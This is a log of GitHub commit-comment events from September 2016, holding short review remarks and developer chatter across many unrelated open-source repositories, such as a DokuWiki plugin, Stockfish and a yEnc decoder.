{"id":"4613789269","type":"CommitCommentEvent","actor":{"login":"abunimeh"},"repo":{"name":"abunimeh/microcp"},"payload":{"comment":{"id":19162704,"position":null,"line":null,"path":null,"commit_id":"f8c1f897b2ff50f603d7b1a519e38ee292805a31","created_at":"2016-09-25T06:57:13Z","updated_at":"2016-09-25T06:57:13Z","body":"to simplify footprint 10103592-0001LF is used."}},"created_at":"2016-09-25T06:57:13Z"}
{"id":"4613789743","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162706,"position":18,"line":18,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:57:45Z","updated_at":"2016-09-25T06:57:45Z","body":"fix it"}},"created_at":"2016-09-25T06:57:45Z"}
{"id":"4613789964","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162709,"position":25,"line":25,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:57:57Z","updated_at":"2016-09-25T06:57:57Z","body":"no, I fixed"}},"created_at":"2016-09-25T06:57:57Z"}
{"id":"4613790032","type":"CommitCommentEvent","actor":{"login":"ikettu"},"repo":{"name":"ikettu/JukolaTest"},"payload":{"comment":{"id":19162711,"position":null,"line":null,"path":null,"commit_id":"9b7f5664b92324e7d5ed962257ea07b041811526","created_at":"2016-09-25T06:58:01Z","updated_at":"2016-09-25T06:58:01Z","body":"This merge did delete and modify some existing code implementing new features. Versioned cache for example. Have to study it more when I am back on computer."}},"created_at":"2016-09-25T06:58:01Z"}
{"id":"4613790096","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162712,"position":40,"line":40,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:58:05Z","updated_at":"2016-09-25T06:58:05Z","body":"fix it"}},"created_at":"2016-09-25T06:58:05Z"}
{"id":"4613790192","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162713,"position":49,"line":49,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:58:12Z","updated_at":"2016-09-25T06:58:12Z","body":"yes"}},"created_at":"2016-09-25T06:58:12Z"}
{"id":"4613790273","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162714,"position":50,"line":50,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:58:17Z","updated_at":"2016-09-25T06:58:17Z","body":"fixit"}},"created_at":"2016-09-25T06:58:17Z"}
{"id":"4613790452","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162716,"position":140,"line":140,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:58:28Z","updated_at":"2016-09-25T06:58:28Z","body":"fixit"}},"created_at":"2016-09-25T06:58:28Z"}
{"id":"4613791002","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162719,"position":8,"line":8,"path":"conf/default.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:59:04Z","updated_at":"2016-09-25T06:59:04Z","body":"It should be deleted?"}},"created_at":"2016-09-25T06:59:04Z"}
{"id":"4613791146","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162720,"position":10,"line":10,"path":"conf/metadata.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T06:59:13Z","updated_at":"2016-09-25T06:59:13Z","body":"It should be deleted?"}},"created_at":"2016-09-25T06:59:13Z"}
{"id":"4613792285","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162732,"position":25,"line":25,"path":"config.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T07:00:17Z","updated_at":"2016-09-25T07:00:17Z","body":"What you tips?"}},"created_at":"2016-09-25T07:00:17Z"}
{"id":"4613794755","type":"CommitCommentEvent","actor":{"login":"tbirand"},"repo":{"name":"EditionGuard/WooCommerce-Plugin"},"payload":{"comment":{"id":19162749,"position":null,"line":null,"path":null,"commit_id":"b3429c9a6d1921d39a8adaa15e2c8651826518aa","created_at":"2016-09-25T07:02:36Z","updated_at":"2016-09-25T07:02:36Z","body":"@vlad0209 each order item should have as many links as it's quantity.\r\nExample order below:\r\n2 x Book 1 -> Should have 2 links\r\n1 x Book 2 -> Should have 1 link"}},"created_at":"2016-09-25T07:02:36Z"}
{"id":"4613795630","type":"CommitCommentEvent","actor":{"login":"ramkumar11110000"},"repo":{"name":"ramkumar11110000/test"},"payload":{"comment":{"id":19162755,"position":null,"line":null,"path":null,"commit_id":"c392f295c7e5536abd1029cdd49c0440cc78e9a5","created_at":"2016-09-25T07:03:33Z","updated_at":"2016-09-25T07:03:33Z","body":"new project\r\n[Ecommerce.zip](https://github.com/ramkumar11110000/test/files/491517/Ecommerce.zip)\r\n\r\n"}},"created_at":"2016-09-25T07:03:33Z"}
{"id":"4613796405","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162756,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T07:04:18Z","updated_at":"2016-09-25T07:04:18Z","body":"maybe you donnt find out the real link,\r\n"}},"created_at":"2016-09-25T07:04:18Z"}
{"id":"4613797379","type":"CommitCommentEvent","actor":{"login":"xpirt"},"repo":{"name":"xpirt/sdat2img"},"payload":{"comment":{"id":19162760,"position":null,"line":null,"path":null,"commit_id":"8ec97e5644175752f14a6f1c832d244aa93ec909","created_at":"2016-09-25T07:05:15Z","updated_at":"2016-09-25T07:05:15Z","body":"Update to python3."}},"created_at":"2016-09-25T07:05:15Z"}
{"id":"4613797548","type":"CommitCommentEvent","actor":{"login":"strublereau"},"repo":{"name":"telecom-paristech-ms-bgd-2017/starter-kit-datascience"},"payload":{"comment":{"id":19162763,"position":null,"line":null,"path":null,"commit_id":"9957d25faa4fd2b1f75e07febc1a4c4d12feb040","created_at":"2016-09-25T07:05:27Z","updated_at":"2016-09-25T07:05:27Z","body":"essai de réadmet"}},"created_at":"2016-09-25T07:05:27Z"}
{"id":"4613797705","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162764,"position":8,"line":8,"path":"dokuimporterClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T07:05:36Z","updated_at":"2016-09-25T07:05:36Z","body":"fixed"}},"created_at":"2016-09-25T07:05:36Z"}
{"id":"4613797832","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162765,"position":22,"line":22,"path":"dokuimporterClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T07:05:44Z","updated_at":"2016-09-25T07:05:44Z","body":"fixed"}},"created_at":"2016-09-25T07:05:44Z"}
{"id":"4613798079","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19162769,"position":5,"line":5,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-25T07:05:59Z","updated_at":"2016-09-25T07:05:59Z","body":"Oh,, okay thanks. I'll try to rewrite this as soon as I get time..... that is.. once I get through the 2150 Exam"}},"created_at":"2016-09-25T07:05:59Z"}
{"id":"4613798242","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162771,"position":1,"line":1,"path":"manager.dat","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T07:06:10Z","updated_at":"2016-09-25T07:06:10Z","body":"It should be deleted?"}},"created_at":"2016-09-25T07:06:10Z"}
{"id":"4613798387","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162772,"position":43,"line":43,"path":"remote.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T07:06:17Z","updated_at":"2016-09-25T07:06:17Z","body":"It should be deleted?"}},"created_at":"2016-09-25T07:06:17Z"}
{"id":"4613799383","type":"CommitCommentEvent","actor":{"login":"Ellusu"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":19162788,"position":35,"line":35,"path":"telegramClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-25T07:07:13Z","updated_at":"2016-09-25T07:07:13Z","body":"fixed"}},"created_at":"2016-09-25T07:07:13Z"}
{"id":"4613799408","type":"CommitCommentEvent","actor":{"login":"fletchto99"},"repo":{"name":"uiri/trebletrouble"},"payload":{"comment":{"id":19162789,"position":null,"line":null,"path":null,"commit_id":"698cf21057fe73b6b126bded70351431072f52cf","created_at":"2016-09-25T07:07:15Z","updated_at":"2016-09-25T07:07:15Z","body":"Looks good! 👍 "}},"created_at":"2016-09-25T07:07:15Z"}
{"id":"4613799596","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"gappleto97/p2p-project"},"payload":{"comment":{"id":19162790,"position":null,"line":null,"path":null,"commit_id":"85b51a12da142573a1bf3934a29c0cb33edb818f","created_at":"2016-09-25T07:07:27Z","updated_at":"2016-09-25T07:07:27Z","body":"So I tested this in IDEOne, but I don't know if it's formatted incorrectly. It's been a while since I worked in Java, so it might be a bit before I get used to the formatting there."}},"created_at":"2016-09-25T07:07:27Z"}
{"id":"4613799653","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162791,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T07:07:30Z","updated_at":"2016-09-25T07:07:30Z","body":"http://wowza.stream.tvb.com//vipo//_definst_//mp4:vipo//he2//1472//147134//000000417399.mp4/playlist.m3u8?ts=1474787160&sig=bdf2da7c881ab0fe6dcb5a3eb224b1bd. No download idm. Session I don't know."}},"created_at":"2016-09-25T07:07:30Z"}
{"id":"4613799908","type":"CommitCommentEvent","actor":{"login":"ikettu"},"repo":{"name":"ikettu/JukolaTest"},"payload":{"comment":{"id":19162793,"position":null,"line":null,"path":null,"commit_id":"999d3e388f827d674b3e15a1ae64273603d37386","created_at":"2016-09-25T07:07:46Z","updated_at":"2016-09-25T07:07:46Z","body":"These were already removed but unfortunate merge did bring them back."}},"created_at":"2016-09-25T07:07:46Z"}
{"id":"4613800105","type":"CommitCommentEvent","actor":{"login":"brunovasquez"},"repo":{"name":"brunovasquez/movieRefactor"},"payload":{"comment":{"id":19162795,"position":null,"line":null,"path":null,"commit_id":"78e9bfb7037d41824e8190d400ce33297f4c226a","created_at":"2016-09-25T07:07:58Z","updated_at":"2016-09-25T07:07:58Z","body":"@carledriss ready to code review"}},"created_at":"2016-09-25T07:07:58Z"}
{"id":"4613802125","type":"CommitCommentEvent","actor":{"login":"Cheedoong"},"repo":{"name":"ShadowFog/shadowsocks-windows"},"payload":{"comment":{"id":19162805,"position":6,"line":32,"path":"shadowsocks-csharp/Controller/ShadowsocksController.cs","commit_id":"eb880d91ef6ad4e6969528337dbc1bd7dbaf05cb","created_at":"2016-09-25T07:10:06Z","updated_at":"2016-09-25T07:10:06Z","body":"End"}},"created_at":"2016-09-25T07:10:06Z"}
{"id":"4613802333","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"Safihre/sabnzbd-yenc"},"payload":{"comment":{"id":19162806,"position":null,"line":null,"path":null,"commit_id":"24da3863c7e1f553c473d7f83511f7904246c329","created_at":"2016-09-25T07:10:16Z","updated_at":"2016-09-25T07:10:16Z","body":"@thezoggy I think the version I made now is as fast as it can ever get for our situation, where we want to parse the whole raw data from the article in C, remove everything from the python code. See decode_buffer_usenet in https://github.com/Safihre/sabnzbd-yenc/blob/master/src/sabyenc.c\r\n\r\nOr see the speedtest in speedtest.py, you can change the test file from the logo.ync to test_no_header to see a real performance test! \r\n(after running setup.py instal, it will be installed as sabyenc, so not overwriting _yenc) \r\n\r\nTried to find those other version before, but seems all the links are down.. Do you have any of them? Like the Fred version. "}},"created_at":"2016-09-25T07:10:16Z"}
{"id":"4613803625","type":"CommitCommentEvent","actor":{"login":"Cheedoong"},"repo":{"name":"ShadowFog/shadowsocks-windows"},"payload":{"comment":{"id":19162814,"position":null,"line":null,"path":null,"commit_id":"eb880d91ef6ad4e6969528337dbc1bd7dbaf05cb","created_at":"2016-09-25T07:11:28Z","updated_at":"2016-09-25T07:11:28Z","body":"Suggestion: add a \"isShadowFogMode\" flag as a switch, \r\n-- this ensures 100% compatibility with the traditional shadowsocks mode. "}},"created_at":"2016-09-25T07:11:28Z"}
{"id":"4613803764","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"davidfowl/Channels"},"payload":{"comment":{"id":19162815,"position":null,"line":null,"path":null,"commit_id":"93fddee61699da7aa17287c79259a68b7f0ced06","created_at":"2016-09-25T07:11:37Z","updated_at":"2016-09-25T07:11:37Z","body":"In UnsafePointer etc: can that return a small but non-zero value when a pointer was not passed in originally? Or: for large enough size of(T) and offset, can it produce a large enough non-zero value to jump outside of the empty page what is used to trigger NRE and pointer-equiv?"}},"created_at":"2016-09-25T07:11:37Z"}
{"id":"4613804711","type":"CommitCommentEvent","actor":{"login":"vasujain"},"repo":{"name":"Opportunity-Hack-2016-SJC-SVCC/TeamFeedMe"},"payload":{"comment":{"id":19162820,"position":null,"line":null,"path":null,"commit_id":"1dc54ecdd96b812796ef7898f156893e3c807c27","created_at":"2016-09-25T07:12:43Z","updated_at":"2016-09-25T07:12:43Z","body":"Can we have better commit descriptions ? @ankitrathi001 "}},"created_at":"2016-09-25T07:12:43Z"}
{"id":"4613804779","type":"CommitCommentEvent","actor":{"login":"wesselah"},"repo":{"name":"gopher2/glinetpineapple"},"payload":{"comment":{"id":19162821,"position":null,"line":null,"path":null,"commit_id":"a0b89de9d5fe3ba5d61d4f4f091827380b458b53","created_at":"2016-09-25T07:12:48Z","updated_at":"2016-09-25T07:12:48Z","body":"Works fine but when i update the modules it stops working is this normal? Or do the modules need a compile to?  I had to erflast again to get it working again"}},"created_at":"2016-09-25T07:12:48Z"}
{"id":"4613808492","type":"CommitCommentEvent","actor":{"login":"tomomiik"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19162842,"position":null,"line":null,"path":null,"commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-25T07:16:31Z","updated_at":"2016-09-25T07:16:31Z","body":"レビューありがとうございます。インデントと空行についてコーディング規約を意識した記述で承知しました。"}},"created_at":"2016-09-25T07:16:31Z"}
{"id":"4613808902","type":"CommitCommentEvent","actor":{"login":"hover20"},"repo":{"name":"kriasoft/react-static-boilerplate"},"payload":{"comment":{"id":19162845,"position":null,"line":null,"path":null,"commit_id":"cbfe71cbd50f08f614eedfca60933db5d8adb78f","created_at":"2016-09-25T07:16:59Z","updated_at":"2016-09-25T07:16:59Z","body":"Do not remove this lines:\r\n\r\nLine 69: Change \"const url\" to \"let url\"\r\n\r\n"}},"created_at":"2016-09-25T07:16:59Z"}
{"id":"4613809121","type":"CommitCommentEvent","actor":{"login":"infotvbcom"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162846,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-25T07:17:06Z","updated_at":"2016-09-25T07:17:06Z","body":"I come from tvb , warning u. I have post this address to tvb. and send hklcf's address to tvb  "}},"created_at":"2016-09-25T07:17:06Z"}
{"id":"4613810822","type":"CommitCommentEvent","actor":{"login":"AIxi0425"},"repo":{"name":"AIxi0425/cpptutorial"},"payload":{"comment":{"id":19162848,"position":null,"line":null,"path":null,"commit_id":"f38427d424244f9d6e177a3ca875b96ffc57d4c5","created_at":"2016-09-25T07:18:35Z","updated_at":"2016-09-25T07:18:35Z","body":"1_basic_of_cpp"}},"created_at":"2016-09-25T07:18:35Z"}
{"id":"4613813040","type":"CommitCommentEvent","actor":{"login":"openankus"},"repo":{"name":"openankus/ankus_optimizer"},"payload":{"comment":{"id":19162850,"position":null,"line":null,"path":null,"commit_id":"d75debd2279765713c282265f9c41f3bbc3c91d1","created_at":"2016-09-25T07:20:50Z","updated_at":"2016-09-25T07:20:50Z","body":"test"}},"created_at":"2016-09-25T07:20:50Z"}
{"id":"4613813703","type":"CommitCommentEvent","actor":{"login":"sejinpark318"},"repo":{"name":"sejinpark318/j1_201411022"},"payload":{"comment":{"id":19162851,"position":null,"line":null,"path":null,"commit_id":"0cec72594b912d2536dfe112e9a25b5c8f427ee5","created_at":"2016-09-25T07:21:23Z","updated_at":"2016-09-25T07:21:23Z","body":"Subway"}},"created_at":"2016-09-25T07:21:23Z"}
{"id":"4613815691","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162853,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T07:23:22Z","updated_at":"2016-09-25T07:23:22Z","body":"@lakb8 Do you know session. Mail: thaonguyen0907110699@gmail.com."}},"created_at":"2016-09-25T07:23:22Z"}
{"id":"4613816036","type":"CommitCommentEvent","actor":{"login":"dgw"},"repo":{"name":"bitlbee/bitlbee"},"payload":{"comment":{"id":19162854,"position":null,"line":null,"path":null,"commit_id":"1a8875ffaae873853fd8537cdce43e35e9889266","created_at":"2016-09-25T07:23:44Z","updated_at":"2016-09-25T07:23:44Z","body":"> I like this Alot.\r\n\r\nHave you named [him](https://hyperboleandahalf.blogspot.com/2010/04/alot-is-better-than-you-at-everything.html)?"}},"created_at":"2016-09-25T07:23:44Z"}
{"id":"4613817365","type":"CommitCommentEvent","actor":{"login":"retokromer"},"repo":{"name":"Matroska-Org/ebml-specification"},"payload":{"comment":{"id":19162855,"position":14,"line":23,"path":"specification.markdown","commit_id":"86ae9159053441d3765fc09c7a48a6fc3cb7d71a","created_at":"2016-09-25T07:24:59Z","updated_at":"2016-09-25T07:24:59Z","body":"why \"may be\"?"}},"created_at":"2016-09-25T07:24:59Z"}
{"id":"4613817490","type":"CommitCommentEvent","actor":{"login":"kof"},"repo":{"name":"styled-components/comparison"},"payload":{"comment":{"id":19162856,"position":23,"line":35,"path":"examples/jss/README.md","commit_id":"68451dc6e0591ebe53dbc59ae052b4663a3fb09d","created_at":"2016-09-25T07:25:07Z","updated_at":"2016-09-25T07:25:07Z","body":"It actually doesn't) https://github.com/styled-components/comparison/pull/33"}},"created_at":"2016-09-25T07:25:07Z"}
{"id":"4613817820","type":"CommitCommentEvent","actor":{"login":"zhangpeng1234"},"repo":{"name":"zhangpeng1234/tinker"},"payload":{"comment":{"id":19162857,"position":1,"line":1,"path":".gitignore","commit_id":"ddd547f864903f1689091a3b3ac53f87198cfdc9","created_at":"2016-09-25T07:25:19Z","updated_at":"2016-09-25T07:25:19Z","body":"zhangpeng123\r\n"}},"created_at":"2016-09-25T07:25:19Z"}
{"id":"4613820297","type":"CommitCommentEvent","actor":{"login":"Darksynx"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19162859,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-25T07:27:34Z","updated_at":"2016-09-25T07:27:34Z","body":"I just wanted to post this compiled version, I have not found the source :(. it might be help. for strange character indeed there are bugs in the 0.46, we must use the trim () to get all ."}},"created_at":"2016-09-25T07:27:34Z"}
{"id":"4613820735","type":"CommitCommentEvent","actor":{"login":"zhangpeng1234"},"repo":{"name":"zhangpeng1234/tinker"},"payload":{"comment":{"id":19162860,"position":null,"line":null,"path":null,"commit_id":"2ca7f76b7cc45dd99864f0f766cc4a065e7a996e","created_at":"2016-09-25T07:28:02Z","updated_at":"2016-09-25T07:28:02Z","body":"zhangpeng"}},"created_at":"2016-09-25T07:28:02Z"}
{"id":"4613820988","type":"CommitCommentEvent","actor":{"login":"lvpeng"},"repo":{"name":"gavinkwoe/weapp-ide-crack"},"payload":{"comment":{"id":19162861,"position":null,"line":null,"path":null,"commit_id":"ab9df90ac1a37cd3693e690bc71b891fa88ecc1c","created_at":"2016-09-25T07:28:18Z","updated_at":"2016-09-25T07:28:18Z","body":"nice！ solve it !"}},"created_at":"2016-09-25T07:28:18Z"}
{"id":"4613821120","type":"CommitCommentEvent","actor":{"login":"2peppers"},"repo":{"name":"tingbot/tingbot-python"},"payload":{"comment":{"id":19162862,"position":null,"line":null,"path":null,"commit_id":"9a172376d7147e9024cac74d0d9ef92ced436f06","created_at":"2016-09-25T07:28:25Z","updated_at":"2016-09-25T07:28:25Z","body":"Agree, this is most correct way of scheduling. "}},"created_at":"2016-09-25T07:28:25Z"}
{"id":"4613821515","type":"CommitCommentEvent","actor":{"login":"monkstone"},"repo":{"name":"ruby-processing/JRubyArt-examples"},"payload":{"comment":{"id":19162863,"position":null,"line":null,"path":null,"commit_id":"916a1601828ac30b48bcbf15c627d3da54ee2806","created_at":"2016-09-25T07:28:48Z","updated_at":"2016-09-25T07:28:48Z","body":"@alexyoung I hacked your ruby-processing sketch to use as a JRubyArt example"}},"created_at":"2016-09-25T07:28:48Z"}
{"id":"4613822681","type":"CommitCommentEvent","actor":{"login":"adameastcoast"},"repo":{"name":"adameastcoast/DoublyLinkedLists"},"payload":{"comment":{"id":19162865,"position":null,"line":null,"path":null,"commit_id":"d921f44e6486235c3270fc402192f355c740ccd9","created_at":"2016-09-25T07:30:05Z","updated_at":"2016-09-25T07:30:05Z","body":"Fixes bug #11 - merge sort now functions correctly."}},"created_at":"2016-09-25T07:30:05Z"}
{"id":"4613824363","type":"CommitCommentEvent","actor":{"login":"retokromer"},"repo":{"name":"Matroska-Org/ebml-specification"},"payload":{"comment":{"id":19162868,"position":null,"line":null,"path":null,"commit_id":"86ae9159053441d3765fc09c7a48a6fc3cb7d71a","created_at":"2016-09-25T07:31:39Z","updated_at":"2016-09-25T07:31:39Z","body":"otherwise, LGTM"}},"created_at":"2016-09-25T07:31:39Z"}
{"id":"4613824723","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19162869,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-25T07:32:03Z","updated_at":"2016-09-25T07:32:03Z","body":"I have submitted a test...\n\nOn Sat, Sep 24, 2016 at 4:25 PM, Marco Costalba <mcostalba@gmail.com> wrote:\n\n> But this should not happen at all, fixing the see is not the correct\n> solution.\n>\n> The correct solution is that this should not happen.\n>\n> I will investigate this issue possibly tomorrow.\n>\n>\n>\n> On Saturday, September 24, 2016, Stéphane Nicolet <\n> notifications@github.com> wrote:\n>\n>> @mcostalba <https://github.com/mcostalba> Because the current SF is\n>> dependent of the SEE values given for illegal moves. Our pruning strategies\n>> in search depends on how many illegal moves we generates in MovePicker, and\n>> what SEE values we give to these illegal moves.\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/snicolet/Stockfish/commit/9607d25e1f110f25cad39363daf16bb346afd522#commitcomment-19157539>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ABDGAd-grHMcZegMF-tuII5IGWoFiFyAks5qtP_7gaJpZM4KEQlO>\n>> .\n>>\n>\n"}},"created_at":"2016-09-25T07:32:03Z"}
{"id":"4613824946","type":"CommitCommentEvent","actor":{"login":"efiring"},"repo":{"name":"powellb/seapy"},"payload":{"comment":{"id":19162870,"position":51,"line":664,"path":"lib.py","commit_id":"b2b7cdd1fba026372d028b3349f33a239d51e0c0","created_at":"2016-09-25T07:32:14Z","updated_at":"2016-09-25T07:32:14Z","body":"If you want to allow the user to specify a tolerance of zero, this should be `if tolerance is not None:`"}},"created_at":"2016-09-25T07:32:14Z"}
{"id":"4613826868","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162873,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-25T07:34:07Z","updated_at":"2016-09-25T07:34:07Z","body":"@infotvbcom You keep sending. Download not so comfortable that you just sent. No other hack people hack it alone."}},"created_at":"2016-09-25T07:34:07Z"}
{"id":"4613827837","type":"CommitCommentEvent","actor":{"login":"AaronHsiao"},"repo":{"name":"AaronHsiao/Android_Pratice_Button_Click"},"payload":{"comment":{"id":19162875,"position":18,"line":28,"path":"app/src/main/res/layout/activity_main.xml","commit_id":"c6bd3d21fc05cfb8aaca11600f146e70b3298f08","created_at":"2016-09-25T07:35:07Z","updated_at":"2016-09-25T07:35:07Z","body":"Key point"}},"created_at":"2016-09-25T07:35:07Z"}
{"id":"4613830230","type":"CommitCommentEvent","actor":{"login":"AaronHsiao"},"repo":{"name":"AaronHsiao/Android_Pratice_Button_Click"},"payload":{"comment":{"id":19162877,"position":null,"line":null,"path":null,"commit_id":"c6bd3d21fc05cfb8aaca11600f146e70b3298f08","created_at":"2016-09-25T07:37:08Z","updated_at":"2016-09-25T07:37:08Z","body":"將Button的onClick事件，對應至自己寫的btn_Click"}},"created_at":"2016-09-25T07:37:08Z"}
{"id":"4613831678","type":"CommitCommentEvent","actor":{"login":"kontza"},"repo":{"name":"ikettu/JukolaTest"},"payload":{"comment":{"id":19162879,"position":null,"line":null,"path":null,"commit_id":"d0df38c15af9f4339a484b0444c8861c5d3850aa","created_at":"2016-09-25T07:38:22Z","updated_at":"2016-09-25T07:38:22Z","body":"Menu and overall usability totally broken as a result. When back at the computer, need to refactor into working state. "}},"created_at":"2016-09-25T07:38:22Z"}
{"id":"4613832428","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19162880,"position":null,"line":null,"path":null,"commit_id":"56ed2c5e38763f59bebeb606311a122e75091c1e","created_at":"2016-09-25T07:39:06Z","updated_at":"2016-09-25T07:39:06Z","body":"Why got this removed? Was it some kind of broken?"}},"created_at":"2016-09-25T07:39:06Z"}
{"id":"4613832586","type":"CommitCommentEvent","actor":{"login":"pke"},"repo":{"name":"eberlitz/splashicon-generator"},"payload":{"comment":{"id":19162881,"position":null,"line":null,"path":null,"commit_id":"7aa8f2f9c330bc5e0a8bcd41bafe5217677e1f61","created_at":"2016-09-25T07:39:15Z","updated_at":"2016-09-25T07:39:15Z","body":"Just didn't see the bin files line ending changed.\r\n@eberlitz how about changing ur git checkout settings always have Unix line endings in the repo?"}},"created_at":"2016-09-25T07:39:15Z"}
{"id":"4613833569","type":"CommitCommentEvent","actor":{"login":"iAstro"},"repo":{"name":"Floris497/mac-pixel-clock-patch-V2"},"payload":{"comment":{"id":19162883,"position":null,"line":null,"path":null,"commit_id":"660a0dbec1ea4055d4404d4bc6d2ecb0c820e033","created_at":"2016-09-25T07:40:13Z","updated_at":"2016-09-25T07:40:13Z","body":"It works well, thank you so much!"}},"created_at":"2016-09-25T07:40:13Z"}
{"id":"4613835047","type":"CommitCommentEvent","actor":{"login":"Skywalker13"},"repo":{"name":"epsitec-sa/electrum-arc"},"payload":{"comment":{"id":19162885,"position":21,"line":79,"path":"src/components/containers/container.component.js","commit_id":"df45876a88f18b229c993d24c017d564c0484092","created_at":"2016-09-25T07:41:38Z","updated_at":"2016-09-25T07:41:38Z","body":"You are not using `map()` correctly. You must use `forEach()` when the array is just iterated and map when you **map a value**.\r\n\r\nFor example:\r\n```js\r\ngetHeights (panelElem) {\r\n  const children = [].slice.call (panelElem.children);\r\n  const heights = children.map (c => c.offsetHeight);\r\n  console.dir (heights);\r\n  return heights;\r\n}\r\n```"}},"created_at":"2016-09-25T07:41:38Z"}
{"id":"4613835253","type":"CommitCommentEvent","actor":{"login":"ncannasse"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19162886,"position":null,"line":null,"path":null,"commit_id":"4e0345e7734f8e9810d5f03f69e75e13a615ddb5","created_at":"2016-09-25T07:41:46Z","updated_at":"2016-09-25T07:41:46Z","body":"I might want to add some Haxe code here, but yes it could be extern, not a big change."}},"created_at":"2016-09-25T07:41:46Z"}
